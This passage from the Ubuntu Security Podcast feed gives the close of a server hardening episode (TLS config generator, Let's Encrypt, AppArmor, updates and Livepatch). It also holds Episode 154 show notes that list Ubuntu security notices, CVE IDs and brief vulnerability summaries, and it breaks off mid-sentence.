<p>Ok, now that we have tackled the <strong>ahem</strong> minor errors I made in the last few
episodes, and honorably mentioned applications I forgot about, let&rsquo;s bring
up a few other hardening suggestions made by the Ubuntu Security Team so
that you can harden your system even more!</p>
<p>Let&rsquo;s start with the Mozilla TLS configuration generator: this tool which
can be accessed through the “<a href="https://ssl-config.mozilla.org/">https://ssl-config.mozilla.org/</a>” URL can be
used to generate configuration files for various server programs, Apache
and Nginx included, and it considers three different security levels!
Pretty nifty, and gives you the opportunity to maybe learn more about
application settings you might not have known all that much about in the
first place, and how they can help you when you wish to do hardening for
applications you use.</p>
<p>Let’s Encrypt is in this list as suggestion number two, and it is a tool
that allows you to get certificates and renew them often enough that you
can&rsquo;t have expired certificates ruin your day. Let&rsquo;s Encrypt is a CA, or,
expanding on the acronym, a Certificate Authority, which is an entity you
will need if you plan on using TLS to encrypt your web server&rsquo;s
communications, for example. You can use Let’s Encrypt to create your
certificates and then configure the tool to automatically update these
certificates whenever they are close to expiring. Phew! No need to worry
about unintentionally sending unencrypted data over the wire because of a
missed expired certificate! Give those attackers NO windows of opportunity!</p>
<p>AppArmor is installed in Ubuntu by default, and we already talked about it
in the last episode, but I am here to ensure that you remember that it does
exist, and, even better, you don&rsquo;t even have to install it in your Ubuntu
system to start using it. Take advantage of its existence and don&rsquo;t forget
to profile applications running in your system! Profile &rsquo;til you can&rsquo;t no
more and get that metaphorical armor polished and ready to take on
everything and everyone, just because you can.</p>
<p>And last but not least, I can&rsquo;t NOT reinforce this, as I am in the security
team and this is what we do for you: always install your updates. Always!
It might seem annoying, it might take some of your time, it might even be a
little bit angering&hellip;but isn&rsquo;t making changes for the better what life is
all about? Update and live to see your server survive another day! Update
and sleep peacefully knowing that you are doing the best you can for that
server you care about! Update and be ready! Some updates will require the
restarting of services, so that those actually start using patched versions
of recently changed libraries, and, when we are talking about the kernel,
reboots might be necessary, so include restarting and rebooting in your
update plans as well, or else the patching done by the security team won&rsquo;t
be effective in your system. If you are having trouble with
this&hellip;shameless plug: consider using Ubuntu Livepatch in order to get
those kernel security-critical updates installed into your system without
having to reboot the machine! It’s free for personal use on up to three
computers, and it is easy to set up through your Ubuntu system with your
Ubuntu One account.</p>
<p>And that is it! An extra episode to patch my previous mistakes, and to
deliver to you updates on some previously incomplete information! An
episode that mirrors the work done by the Ubuntu Team on its packages, and
that hopefully brings you as many benefits as those patches do! Keep your
patches up to date, keep your hardening up to date, keep your knowledge up
to date, and I am sure you will be ready to face a lot more than you
expect! Thank you all for listening to this extra episode of the Ubuntu
hardening series on the Ubuntu Security Podcast. Feel free to share your
thoughts on this subject and on this series in any of our social media
channels! I hope to talk to you all once again in the future, but for now,
I bid you farewell and until next time! Bye!</p>
<h3 id="ubuntu-22-dot-04-beta-released">Ubuntu 22.04 Beta Released</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2022-March/000278.html">https://lists.ubuntu.com/archives/ubuntu-announce/2022-March/000278.html</a></li>
<li><a href="https://help.ubuntu.com/community/JammyUpgrades">https://help.ubuntu.com/community/JammyUpgrades</a></li>
<li><a href="https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668">https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668</a></li>
<li><a href="https://www.omgubuntu.co.uk/2022/03/ubuntu-22-04-beta-is-now-available-download">https://www.omgubuntu.co.uk/2022/03/ubuntu-22-04-beta-is-now-available-download</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E155.mp3" length="21898080" type="audio/mpeg" /><itunes:duration>1989</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 154
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-154/</link>
          <pubDate>Fri, 25 Mar 2022 15:56:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>59f79b936afb00295267d32e518ed58734b858a7dfe5b010f73bc75d7841f1795a672c2320022a7476a09dd89296b1ca7530e2cd0f015c4e3c57ea19df0fd66f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 154</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's PIE🥧 for everyone this week as Python finally becomes a position
  independent executable for Ubuntu 22.04, plus Camila brings you the third
  part in her Ubuntu server hardening guide and we cover security updates for
  FUSE, Bind,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's PIE🥧 for everyone this week as Python finally becomes a position
  independent executable for Ubuntu 22.04, plus Camila brings you the third
  part in her Ubuntu server hardening guide and we cover security updates for
  FUSE, Bind, Apache, the Linux kernel and more.
  </itunes:summary>
        <description>  It's PIE🥧 for everyone this week as Python finally becomes a position
  independent executable for Ubuntu 22.04, plus Camila brings you the third
  part in her Ubuntu server hardening guide and we cover security updates for
  FUSE, Bind, Apache, the Linux kernel and more.
  </description>
        <googleplay:description>  It's PIE🥧 for everyone this week as Python finally becomes a position
  independent executable for Ubuntu 22.04, plus Camila brings you the third
  part in her Ubuntu server hardening guide and we cover security updates for
  FUSE, Bind, Apache, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s PIE🥧 for everyone this week as Python finally becomes a position
independent executable for Ubuntu 22.04, plus Camila brings you the third
part in her Ubuntu server hardening guide and we cover security updates for
FUSE, Bind, Apache, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>105 unique CVEs addressed</p>
<h3 id="usn-5326-1-fuse-vulnerability-00-49">[<a href="https://ubuntu.com/security/notices/USN-5326-1">USN-5326-1</a>] FUSE vulnerability [00:49]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10906">CVE-2018-10906</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When using SELinux on Ubuntu, possible to bypass regular restrictions
that would normally prevent non-root users from mounting a FUSE fs with
the <code>allow_other</code> mount option - this option specifies all users can access
files from the FUSE fs whereas normally FUSE enforces on the user which
mounted the file has access</li>
<li>Could trick another user into then accessing files from the FUSE fs</li>
</ul>
<h3 id="usn-5334-1-man-db-vulnerability-02-22">[<a href="https://ubuntu.com/security/notices/USN-5334-1">USN-5334-1</a>] man-db vulnerability [02:22]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-1336">CVE-2015-1336</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>daily cron job could allow a local user to access the man user account</li>
</ul>
<h3 id="usn-5321-2-firefox-vulnerabilities-02-57">[<a href="https://ubuntu.com/security/notices/USN-5321-2">USN-5321-2</a>] Firefox vulnerabilities [02:57]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26387">CVE-2022-26387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26385">CVE-2022-26385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26384">CVE-2022-26384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26383">CVE-2022-26383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26382">CVE-2022-26382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26381">CVE-2022-26381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0843">CVE-2022-0843</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>arm64 binaries for Firefox 98.0.1 <a href="https://ubuntusecuritypodcast.org/episode-153/">Episode 153</a></li>
</ul>
<h3 id="usn-5332-1-usn-5332-2-bind-vulnerabilities-03-25">[<a href="https://ubuntu.com/security/notices/USN-5332-1">USN-5332-1</a>, <a href="https://ubuntu.com/security/notices/USN-5332-2">USN-5332-2</a>] Bind vulnerabilities [03:25]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0396">CVE-2022-0396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25220">CVE-2021-25220</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-25220">CVE-2021-25220</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible cache poisoning attack via forwarded NS records</li>
<li>fd exhaustion if client could trick bind into keeping connection in
<code>CLOSE_WAIT</code> status for an indefinite period, after connection was closed -
DoS</li>
</ul>
<h3 id="usn-5333-1-usn-5333-2-apache-http-server-vulnerabilities-04-11">[<a href="https://ubuntu.com/security/notices/USN-5333-1">USN-5333-1</a>, <a href="https://ubuntu.com/security/notices/USN-5333-2">USN-5333-2</a>] Apache HTTP Server vulnerabilities [04:11]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23943">CVE-2022-23943</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22721">CVE-2022-22721</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22720">CVE-2022-22720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22719">CVE-2022-22719</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>heap OOB r/w via <code>mod_sed</code> -&gt; crash, RCE</li>
<li>OOB read from crafted request via <code>mod_lua</code> - crash -&gt; DoS</li>
<li>Possible HTTP request smuggling attack since failed to close an inbound
connection when an error was encountered which caused the request body to
be discarded</li>
<li>Possible integer overflow on 32-bit systems if had changed default
<code>LimitXMLRequestBody</code> to &gt; 350MB (is 1MB by default) -&gt; OOB write -&gt; crash,
RCE</li>
</ul>
<h3 id="usn-5335-1-imagemagick-vulnerabilities-05-51">[<a href="https://ubuntu.com/security/notices/USN-5335-1">USN-5335-1</a>] ImageMagick vulnerabilities [05:51]</h3>
<ul>
<li>15 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20243">CVE-2021-20243</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20241">CVE-2021-20241</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20176">CVE-2021-20176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27770">CVE-2020-27770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27766">CVE-2020-27766</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27762">CVE-2020-27762</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27760">CVE-2020-27760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27750">CVE-2020-27750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25676">CVE-2020-25676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27753">CVE-2020-27753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25674">CVE-2020-25674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25665">CVE-2020-25665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25664">CVE-2020-25664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13144">CVE-2017-13144</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19667">CVE-2020-19667</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read/write/NULL ptr deref, div by 0 etc when processing crafted image
files</li>
</ul>
<h3 id="usn-5337-1-linux-kernel-vulnerabilities-06-23">[<a href="https://ubuntu.com/security/notices/USN-5337-1">USN-5337-1</a>] Linux kernel vulnerabilities [06:23]</h3>
<ul>
<li>21 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0742">CVE-2022-0742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0516">CVE-2022-0516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0435">CVE-2022-0435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0382">CVE-2022-0382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0264">CVE-2022-0264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45480">CVE-2021-45480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45402">CVE-2021-45402</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45095">CVE-2021-45095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44733">CVE-2021-44733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43975">CVE-2021-43975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4197">CVE-2021-4197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4135">CVE-2021-4135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39698">CVE-2021-39698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39685">CVE-2021-39685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28715">CVE-2021-28715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28714">CVE-2021-28714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28713">CVE-2021-28713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28712">CVE-2021-28712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28711">CVE-2021-28711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23222">CVE-2022-23222</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 (impish, 20.04 HWE)</li>
<li>BPF verifier could possibly allow pointer arithmetic in BPF operations -
OOB read / write -&gt; crash (DoS) or privesc</li>
<li>cgroups v1 <code>release_agent</code> not properly restricted -&gt; privesc</li>
</ul>
<h3 id="usn-5338-1-linux-kernel-vulnerabilities-07-31">[<a href="https://ubuntu.com/security/notices/USN-5338-1">USN-5338-1</a>] Linux kernel vulnerabilities [07:31]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0516">CVE-2022-0516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0435">CVE-2022-0435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45480">CVE-2021-45480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45095">CVE-2021-45095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44733">CVE-2021-44733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43976">CVE-2021-43976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4135">CVE-2021-4135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28715">CVE-2021-28715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28714">CVE-2021-28714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28713">CVE-2021-28713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28712">CVE-2021-28712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28711">CVE-2021-28711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 (focal, bionic HWE)</li>
</ul>
<h3 id="usn-5339-1-linux-kernel-vulnerabilities-07-43">[<a href="https://ubuntu.com/security/notices/USN-5339-1">USN-5339-1</a>] Linux kernel vulnerabilities [07:43]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0435">CVE-2022-0435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45095">CVE-2021-45095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44733">CVE-2021-44733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43976">CVE-2021-43976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3506">CVE-2021-3506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (bionic, xenial ESM, trusty ESM - azure)</li>
</ul>
<h3 id="usn-5343-1-linux-kernel-vulnerabilities-08-00">[<a href="https://ubuntu.com/security/notices/USN-5343-1">USN-5343-1</a>] Linux kernel vulnerabilities [08:00]</h3>
<ul>
<li>45 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5995">CVE-2018-5995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45485">CVE-2021-45485</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45469">CVE-2021-45469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45095">CVE-2021-45095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43389">CVE-2021-43389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42008">CVE-2021-42008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40490">CVE-2021-40490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39648">CVE-2021-39648</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38208">CVE-2021-38208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38198">CVE-2021-38198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3573">CVE-2021-3573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3564">CVE-2021-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3506">CVE-2021-3506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3483">CVE-2021-3483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34693">CVE-2021-34693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33098">CVE-2021-33098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33033">CVE-2021-33033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32399">CVE-2021-32399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29650">CVE-2021-29650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28972">CVE-2021-28972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28688">CVE-2021-28688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23134">CVE-2021-23134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20317">CVE-2021-20317</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20292">CVE-2021-20292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36385">CVE-2020-36385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36322">CVE-2020-36322</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0129">CVE-2021-0129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26558">CVE-2020-26558</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26555">CVE-2020-26555</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26139">CVE-2020-26139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25673">CVE-2020-25673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25672">CVE-2020-25672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25671">CVE-2020-25671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25670">CVE-2020-25670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12655">CVE-2020-12655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19449">CVE-2019-19449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2854">CVE-2016-2854</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2853">CVE-2016-2853</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 (xenial ESM, trusty ESM)</li>
</ul>
<h3 id="lsn-0085-1-linux-kernel-vulnerability-08-15">[<a href="https://ubuntu.com/security/notices/LSN-0085-1">LSN-0085-1</a>] Linux kernel vulnerability [08:15]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-25636">CVE-2022-25636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Livepatch</li>
</ul>
<table>
  <thead>
      <tr>
          <th>KERNEL TYPE</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
          <th>14.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>85.1</td>
          <td>85.1</td>
          <td>85.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>85.1</td>
          <td>—</td>
          <td>85.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-4.15</td>
          <td>—</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>85.1</td>
          <td>85.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>85.1</td>
          <td>85.1</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>85.2</td>
          <td>85.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-4.15</td>
          <td>—</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.4</td>
          <td>—</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop-5.4</td>
          <td>—</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.4</td>
          <td>—</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>85.1</td>
          <td>85.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>85.1</td>
          <td>85.1</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>85.2</td>
          <td>85.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>oem</td>
          <td>—</td>
          <td>85.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<h3 id="usn-5341-1-gnu-binutils-vulnerabilities-09-04">[<a href="https://ubuntu.com/security/notices/USN-5341-1">USN-5341-1</a>] GNU binutils vulnerabilities [09:04]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45078">CVE-2021-45078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3487">CVE-2021-3487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17122">CVE-2017-17122</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read, OOB write and memory leak when handling crafted files -
binutils is not generally expected to operate on untrusted data so
upstream and our team do not usually consider vulns in binutils to be
high impact</li>
</ul>
<h3 id="usn-5340-1-ckeditor-vulnerabilities-09-50">[<a href="https://ubuntu.com/security/notices/USN-5340-1">USN-5340-1</a>] CKEditor vulnerabilities [09:50]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-37695">CVE-2021-37695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33829">CVE-2021-33829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32809">CVE-2021-32809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32808">CVE-2021-32808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9281">CVE-2020-9281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9861">CVE-2018-9861</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>JS rich text editor to be embedded in web pages - often used by django
and other projects</li>
<li>3x XSS, 3xJS RCE</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="camila-discusses-ubuntu-hardening--part-3--10-23">Camila discusses Ubuntu hardening (part 3) [10:23]</h3>
<ul>
<li>In the third part of this series on hardening a Ubuntu machine against
external attack, Camila looks at steps you can take to secure your
